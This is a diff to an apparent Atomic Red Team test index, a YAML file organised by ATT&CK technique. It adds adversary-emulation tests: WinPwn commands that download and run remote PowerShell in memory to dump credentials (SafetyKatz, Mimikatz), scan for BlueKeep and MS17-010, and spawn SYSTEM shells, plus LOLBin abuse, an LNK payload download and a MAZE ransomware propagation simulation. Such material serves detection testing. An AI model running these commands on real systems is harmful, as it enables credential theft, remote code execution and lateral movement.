         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: WinPwn - Loot local Credentials - powerhell kittie
+      auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
+      description: Loot local Credentials - powerhell kittie technique via function
+        of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          obfuskittiedump -consoleoutput -noninteractive
+        name: powershell
+    - name: WinPwn - Loot local Credentials - Safetykatz
+      auto_generated_guid: e9fdb899-a980-4ba4-934b-486ad22e22f4
+      description: Loot local Credentials - Safetykatz technique via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          safedump -consoleoutput -noninteractive
+        name: powershell
   T1218.014:
     technique:
       object_marking_refs:
@@ -37875,7 +38396,20 @@ defense-evasion:
         description: MDSec Research. (n.d.). Detecting and Advancing In-Memory .NET
           Tradecraft. Retrieved October 4, 2021.
         source_name: MDSec Detecting DOTNET
-    atomic_tests: []
+      identifier: T1620
+    atomic_tests:
+    - name: WinPwn - Reflectively load Mimik@tz into memory
+      auto_generated_guid: 56b9589c-9170-4682-8c3d-33b86ecb5119
+      description: Reflectively load Mimik@tz into memory technique via function of
+        WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          mimiload -consoleoutput -noninteractive
+        name: powershell
   T1218.009:
     technique:
       type: attack-pattern
@@ -40722,6 +41256,32 @@ defense-evasion:
           '
         cleanup_command: taskkill /f /im calculator.exe > nul 2>&1
         name: command_prompt
+    - name: Lolbin Gpscript logon option
+      auto_generated_guid: 5bcda9cd-8e85-48fa-861d-b5a85d91d48c
+      description: |
+        Executes logon scripts configured in Group Policy.
+        https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
+        https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
+      supported_platforms:
+      - windows
+      executor:
+        command: 'Gpscript /logon
+
+          '
+        name: command_prompt
+    - name: Lolbin Gpscript startup option
+      auto_generated_guid: f8da74bb-21b8-4af9-8d84-f2c8e4a220e3
+      description: |
+        Executes startup scripts configured in Group Policy
+        https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
+        https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
+      supported_platforms:
+      - windows
+      executor:
+        command: 'Gpscript /startup
+
+          '
+        name: command_prompt
   T1216:
     technique:
       object_marking_refs:
@@ -42387,7 +42947,90 @@ defense-evasion:
       - url: https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/
         description: LOLBAS. (n.d.). Tracker.exe. Retrieved July 31, 2019.
         source_name: LOLBAS Tracker
-    atomic_tests: []
+      identifier: T1127
+    atomic_tests:
+    - name: Lolbin Jsc.exe compile javascript to exe
+      auto_generated_guid: 1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8
+      description: |
+        Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.
+        https://lolbas-project.github.io/lolbas/Binaries/Jsc/
+        https://www.phpied.com/make-your-javascript-a-windows-exe/
+      supported_platforms:
+      - windows
+      input_arguments:
+        filename:
+          description: Location of the project file
+          type: Path
+          default: PathToAtomicsFolder\T1127\src\hello.js
+        jscpath:
+          description: Default location of jsc.exe
+          type: Path
+          default: C:\Windows\Microsoft.NET\Framework\v4.0.30319
+        jscname:
+          description: Default name of jsc
+          type: Path
+          default: jsc.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'JavaScript code file must exist on disk at specified location
+          (#{filename})
+
+          '
+        prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/hello.js" -OutFile "#{filename}"
+      executor:
+        command: |
+          copy #{filename} %TEMP%\hello.js
+          #{jscpath}\#{jscname} %TEMP%\hello.js
+        cleanup_command: |
+          del %TEMP%\hello.js
+          del %TEMP%\hello.exe
+        name: command_prompt
+    - name: Lolbin Jsc.exe compile javascript to dll
+      auto_generated_guid: 3fc9fea2-871d-414d-8ef6-02e85e322b80
+      description: |
+        Use jsc.exe to compile javascript code stored in Library.js and output Library.dll.
+        https://lolbas-project.github.io/lolbas/Binaries/Jsc/
+        https://www.phpied.com/make-your-javascript-a-windows-exe/
+      supported_platforms:
+      - windows
+      input_arguments:
+        filename:
+          description: Location of the project file
+          type: Path
+          default: PathToAtomicsFolder\T1127\src\LibHello.js
+        jscpath:
+          description: Default location of jsc.exe
+          type: Path
+          default: C:\Windows\Microsoft.NET\Framework\v4.0.30319
+        jscname:
+          description: Default name of jsc
+          type: Path
+          default: jsc.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'JavaScript code file must exist on disk at specified location
+          (#{filename})
+
+          '
+        prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/LibHello.js" -OutFile "#{filename}"
+      executor:
+        command: |
+          copy #{filename} %TEMP%\LibHello.js
+          #{jscpath}\#{jscname} /t:library %TEMP%\LibHello.js
+        cleanup_command: |
+          del %TEMP%\LibHello.js
+          del %TEMP%\LibHello.dll
+        name: command_prompt
   T1535:
     technique:
       object_marking_refs:
@@ -47973,7 +48616,7 @@ persistence:
         command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload''
 
           '
-        cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload
+        cleanup_command: 'sudo sed -i ''s##{path_to_shared_library}##'' /etc/ld.so.preload
 
           '
         name: bash
@@ -49714,6 +50357,29 @@ persistence:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: WinPwn - Loot local Credentials - powerhell kittie
+      auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
+      description: Loot local Credentials - powerhell kittie technique via function
+        of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          obfuskittiedump -consoleoutput -noninteractive
+        name: powershell
+    - name: WinPwn - Loot local Credentials - Safetykatz
+      auto_generated_guid: e9fdb899-a980-4ba4-934b-486ad22e22f4
+      description: Loot local Credentials - Safetykatz technique via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          safedump -consoleoutput -noninteractive
+        name: powershell
   T1547.015:
     technique:
       object_marking_refs:
@@ -58748,6 +59414,18 @@ discovery:
           };Write-Output "`n" }}
 
           '
+    - name: WinPwn - generaldomaininfo
+      auto_generated_guid: ce483c35-c74b-45a7-a670-631d1e69db3d
+      description: Gathers general domain information using the generaldomaininfo
+        function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          generaldomaininfo -noninteractive -consoleoutput
+        name: powershell
   T1069.002:
     technique:
       type: attack-pattern
@@ -59570,6 +60248,30 @@ discovery:
           Get-DomainGPO"
         name: powershell
         elevation_required: true
+    - name: WinPwn - GPOAudit
+      auto_generated_guid: bc25c04b-841e-4965-855f-d1f645d7ab73
+      description: Check domain Group policies for common misconfigurations using
+        Grouper2 via GPOAudit function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          GPOAudit -noninteractive -consoleoutput
+        name: powershell
+    - name: WinPwn - GPORemoteAccessPolicy
+      auto_generated_guid: 7230d01a-0a72-4bd5-9d7f-c6d472bc6a59
+      description: Enumerate remote access policies through group policy using GPORemoteAccessPolicy
+        function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          GPORemoteAccessPolicy -consoleoutput -noninteractive
+        name: powershell
   T1016.001:
     technique:
       object_marking_refs:
@@ -60179,6 +60881,55 @@ discovery:
 
           '
         name: powershell
+    - name: WinPwn - spoolvulnscan
+      auto_generated_guid: 54574908-f1de-4356-9021-8053dd57439a
+      description: Start MS-RPRN RPC Service Scan using spoolvulnscan function of
+        WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          spoolvulnscan -noninteractive -consoleoutput
+        name: powershell
+    - name: WinPwn - MS17-10
+      auto_generated_guid: 97585b04-5be2-40e9-8c31-82157b8af2d6
+      description: Search for MS17-10 vulnerable Windows Servers in the domain using
+        powerSQL function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          MS17-10 -noninteractive -consoleoutput
+        name: powershell
+    - name: WinPwn - bluekeep
+      auto_generated_guid: 1cca5640-32a9-46e6-b8e0-fabbe2384a73
+      description: Search for bluekeep vulnerable Windows Systems in the domain using
+        bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds
+        in testing on a small domain).
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          bluekeep -noninteractive -consoleoutput
+        name: powershell
+    - name: WinPwn - fruit
+      auto_generated_guid: bb037826-cbe8-4a41-93ea-b94059d6bb98
+      description: Search for potentially vulnerable web apps (low hanging fruits)
+        using fruit function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          fruit -noninteractive -consoleoutput
+        name: powershell
   T1135:
     technique:
       object_marking_refs:
@@ -60381,6 +61132,18 @@ discovery:
           Import-Module $env:TEMP\PowerView.ps1
           Invoke-ShareFinder #{parameters}
         name: powershell
+    - name: WinPwn - shareenumeration
+      auto_generated_guid: 987901d1-5b87-4558-a6d9-cffcabc638b8
+      description: Network share enumeration using the shareenumeration function of
+        WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          shareenumeration -noninteractive -consoleoutput
+        name: powershell
   T1040:
     technique:
       object_marking_refs:
@@ -60563,6 +61326,33 @@ discovery:
           del %temp%\trace.cab >nul 2>&1
         name: command_prompt
         elevation_required: true
+    - name: Windows Internal pktmon capture
+      auto_generated_guid: c67ba807-f48b-446e-b955-e4928cd1bf91
+      description: |-
+        Will start a packet capture and store log file as t1040.etl.
+        https://lolbas-project.github.io/lolbas/Binaries/Pktmon/
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          pktmon.exe start --etw  -f %TEMP%\t1040.etl
+          TIMEOUT /T 5 >nul 2>&1
+          pktmon.exe stop
+        cleanup_command: del %TEMP%\t1040.etl
+        name: command_prompt
+        elevation_required: true
+    - name: Windows Internal pktmon set filter
+      auto_generated_guid: 855fb8b4-b8ab-4785-ae77-09f5df7bff55
+      description: "Select Desired ports for packet capture \nhttps://lolbas-project.github.io/lolbas/Binaries/Pktmon/"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'pktmon.exe filter add -p 445
+
+          '
+        cleanup_command: pktmon filter remove
+        name: command_prompt
+        elevation_required: true
   T1201:
     technique:
       object_marking_refs:
@@ -60812,6 +61602,18 @@ discovery:
           @($Heading; $Break; $Data |Sort-Object -Unique) | ? {$_.trim() -ne "" } |Set-Content $env:TEMP\T1120_collection.txt
         cleanup_command: Remove-Item $env:TEMP\T1120_collection.txt -ErrorAction Ignore
         name: powershell
+    - name: WinPwn - printercheck
+      auto_generated_guid: cb6e76ca-861e-4a7f-be08-564caa3e6f75
+      description: Search for printers / potential vulns using printercheck function
+        of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          printercheck -noninteractive -consoleoutput
+        name: powershell
   T1069:
     technique:
       object_marking_refs:
@@ -61751,9 +62553,44 @@ discovery:
       executor:
         name: sh
         elevation_required: false
-        command: |-
+        command: |
           /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
           /usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist
+    - name: WinPwn - Dotnetsearch
+      auto_generated_guid: 7e79a1b6-519e-433c-ad55-3ff293667101
+      description: Search for any .NET binary file in a share using the Dotnetsearch
+        function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          Dotnetsearch -noninteractive -consoleoutput
+        name: powershell
+    - name: WinPwn - DotNet
+      auto_generated_guid: 10ba02d0-ab76-4f80-940d-451633f24c5b
+      description: Search for .NET Service-Binaries on this system via winpwn dotnet
+        function of WinPwn.
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          dotnet -consoleoutput -noninteractive
+        name: powershell
+    - name: WinPwn - powerSQL
+      auto_generated_guid: 0bb64470-582a-4155-bde2-d6003a95ed34
+      description: Start PowerUpSQL Checks using powerSQL function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          powerSQL -noninteractive -consoleoutput
+        name: powershell
   T1497.001:
     technique:
       type: attack-pattern
@@ -62164,6 +63001,129 @@ discovery:
 
           '
         name: sh
+    - name: WinPwn - winPEAS
+      auto_generated_guid: eea1d918-825e-47dd-acc2-814d6c58c0e1
+      description: Discover Local Privilege Escalation possibilities using winPEAS
+        function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          winPEAS -noninteractive -consoleoutput
+        name: powershell
+    - name: WinPwn - itm4nprivesc
+      auto_generated_guid: 3d256a2f-5e57-4003-8eb6-64d91b1da7ce
+      description: Discover Local Privilege Escalation possibilities using itm4nprivesc
+        function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          itm4nprivesc -noninteractive -consoleoutput
+        name: powershell
+    - name: WinPwn - Powersploits privesc checks
+      auto_generated_guid: 345cb8e4-d2de-4011-a580-619cf5a9e2d7
+      description: Powersploits privesc checks using oldchecks function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          oldchecks -noninteractive -consoleoutput
+        cleanup_command: |-
+          rm -force -recurse .\DomainRecon -ErrorAction Ignore
+          rm -force -recurse .\Exploitation -ErrorAction Ignore
+          rm -force -recurse .\LocalPrivEsc -ErrorAction Ignore
+          rm -force -recurse .\LocalRecon -ErrorAction Ignore
+          rm -force -recurse .\Vulnerabilities -ErrorAction Ignore
+        name: powershell
+    - name: WinPwn - General privesc checks
+      auto_generated_guid: 5b6f39a2-6ec7-4783-a5fd-2c54a55409ed
+      description: General privesc checks using the otherchecks function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          otherchecks -noninteractive -consoleoutput
+        name: powershell
+    - name: WinPwn - GeneralRecon
+      auto_generated_guid: 7804659b-fdbf-4cf6-b06a-c03e758590e8
+      description: Collect general computer informations via GeneralRecon function
+        of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          Generalrecon -consoleoutput -noninteractive
+        name: powershell
+    - name: WinPwn - Morerecon
+      auto_generated_guid: 3278b2f6-f733-4875-9ef4-bfed34244f0a
+      description: Gathers local system information using the Morerecon function of
+        WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          Morerecon -noninteractive -consoleoutput
+        name: powershell
+    - name: WinPwn - RBCD-Check
+      auto_generated_guid: dec6a0d8-bcaf-4c22-9d48-2aee59fb692b
+      description: Search for Resource-Based Constrained Delegation attack paths using
+        RBCD-Check function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          RBCD-Check -consoleoutput -noninteractive
+        name: powershell
+    - name: WinPwn - PowerSharpPack - Watson searching for missing windows patches
+      auto_generated_guid: 07b18a66-6304-47d2-bad0-ef421eb2e107
+      description: PowerSharpPack - Watson searching for missing windows patches  technique
+        via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')
+          Invoke-watson
+        name: powershell
+    - name: WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors
+      auto_generated_guid: efb79454-1101-4224-a4d0-30c9c8b29ffc
+      description: PowerSharpPack - Sharpup checking common Privesc vectors technique
+        via function of WinPwn - Takes several minutes to complete.
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
+          Invoke-SharpUp -command "audit"
+        name: powershell
+    - name: WinPwn - PowerSharpPack - Seatbelt
+      auto_generated_guid: 5c16ceb4-ba3a-43d7-b848-a13c1f216d95
+      description: |-
+        PowerSharpPack - Seatbelt technique via function of WinPwn.
+
+        [Seatbelt](https://github.com/GhostPack/Seatbelt) is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
+          Invoke-Seatbelt -Command "-group=all"; pause
+        name: powershell
   T1614.001:
     technique:
       object_marking_refs:
@@ -68833,6 +69793,25 @@ execution:
           -ErrorAction Ignore
 
           '
+    - name: LNK Payload Download
+      auto_generated_guid: 581d7521-9c4b-420e-9695-2aec5241167f
+      description: This lnk files invokes powershell to download putty from the internet
+        and opens the file. https://twitter.com/ankit_anubhav/status/1518932941090410496
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk"
+          $file1 = "$env:Temp\test10.lnk"
+          Start-Process $file1
+          Start-Sleep -s 10
+          taskkill /IM a.exe /F
+        cleanup_command: |-
+          $file1 = "$env:Temp\test10.lnk"
+          $file2 = "$env:Temp\a.exe"
+          Remove-Item $file1 -ErrorAction Ignore
+          Remove-Item $file2 -ErrorAction Ignore
+        name: powershell
   T1204.003:
     technique:
       object_marking_refs:
@@ -69058,6 +70037,34 @@ execution:
           C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:"#{output_file}" /target:exe #{source_file}
           %tmp%/T1106.exe
         name: command_prompt
+    - name: WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique
+      auto_generated_guid: ce4e76e6-de70-4392-9efe-b281fc2b4087
+      description: Get SYSTEM shell - Pop System Shell using CreateProcess technique
+        via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystem.ps1')
+        name: powershell
+    - name: WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique
+      auto_generated_guid: 7ec5b74e-8289-4ff2-a162-b6f286a33abd
+      description: Get SYSTEM shell - Bind System Shell using CreateProcess technique
+        via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystemBind.ps1')
+        name: powershell
+    - name: WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation
+        technique
+      auto_generated_guid: e1f93a06-1649-4f07-89a8-f57279a7d60e
+      description: Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation
+        technique via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')
+        name: powershell
   T1059.008:
     technique:
       object_marking_refs:
@@ -75591,6 +76598,92 @@ command-and-control:
           del /f/s/q %temp%\T1105 >nul 2>&1
           rmdir /s/q %temp%\T1105 >nul 2>&1
         name: command_prompt
+    - name: MAZE Propagation Script
+      auto_generated_guid: 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf
+      description: "This test simulates MAZE ransomware's propogation script that
+        searches through a list of computers, tests connectivity to them, and copies
+        a binary file to the Windows\\Temp directory of each one. \nUpon successful
+        execution, a specified binary file will attempt to be copied to each online
+        machine, a list of the online machines, as well as a list of offline machines
+        will be output to a specified location.\nReference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
+        \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        binary_file:
+          description: Binary file to copy to remote machines
+          type: string
+          default: "$env:comspec"
+        exe_remote_folder:
+          description: Path to store executable on remote machine (no drive letter)
+          type: String
+          default: "\\Windows\\Temp\\T1105.exe"
+        remote_drive_letter:
+          description: Remote drive letter
+          type: String
+          default: C
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Binary file must exist at specified location (#{binary_file})
+
+          '
+        prereq_command: 'if (Test-Path #{binary_file}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: 'write-host "The binary_file input parameter must be set
+          to a binary that exists on this computer."
+
+          '
+      - description: 'Machine list must exist at specified location ("$env:temp\T1105MachineList.txt")
+
+          '
+        prereq_command: 'if (Test-Path "$env:temp\T1105MachineList.txt") {exit 0}
+          else {exit 1}
+
+          '
+        get_prereq_command: |
+          new-item -path "$env:temp\T1105MachineList.txt"
+          echo "A machine list file has been generated at "$env:temp\T1105MachineList.txt". Please enter the machines to target there, one machine per line."
+      executor:
+        command: "$machine_list = \"$env:temp\\T1105MachineList.txt\"\n$offline_list
+          = \"$env:temp\\T1105OfflineHosts.txt\"\n$completed_list = \"$env:temp\\T1105CompletedHosts.txt\"\nforeach
+          ($machine in get-content -path \"$machine_list\")\n{if (test-connection
+          -Count 1 -computername $machine -quiet) \n{cmd /c copy \"#{binary_file}\"
+          \"\\\\$machine\\#{remote_drive_letter}$#{exe_remote_folder}\"\necho $machine
+          >> \"$completed_list\"\nwmic /node: \"$machine\" process call create \"regsvr32.exe
+          /i #{remote_drive_letter}:#{exe_remote_folder}\"}\nelse\n{echo $machine
+          >> \"$offline_list\"}}\n"
+        cleanup_command: "if (test-path \"$env:temp\\T1105CompletedHosts.txt\") \n{foreach
+          ($machine in get-content -path \"$env:temp\\T1105CompletedHosts.txt\")\n{wmic
+          /node: \"$machine\" process where name='\"regsvr32.exe\"' call terminate
+          | out-null\nRemove-Item -path \"\\\\$machine\\#{remote_drive_letter}$#{exe_remote_folder}\"
+          -force -erroraction silentlycontinue}}\nRemove-Item -path \"$env:temp\\T1105OfflineHosts.txt\"
+          -erroraction silentlycontinue\nRemove-item -path \"$env:temp\\T1105CompletedHosts.txt\"
+          -erroraction silentlycontinue\n"
+        name: powershell
+    - name: Printer Migration Command-Line Tool UNC share folder into a zip file
+      auto_generated_guid: 49845fc1-7961-4590-a0f0-3dbcf065ae7e
+      description: 'Create a ZIP file from a folder in a remote drive
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        Path_unc:
+          description: Path to the UNC folder
+          type: Path
+          default: "\\\\127.0.0.1\\c$\\AtomicRedTeam\\atomics\\T1105\\src\\"
+        Path_PrintBrm:
+          description: Path to PrintBrm.exe
+          type: Path
+          default: C:\Windows\System32\spool\tools\PrintBrm.exe
+      executor:
+        command: "del %TEMP%\\PrintBrm.zip >nul 2>&1 \n#{Path_PrintBrm} -b -d #{Path_unc}
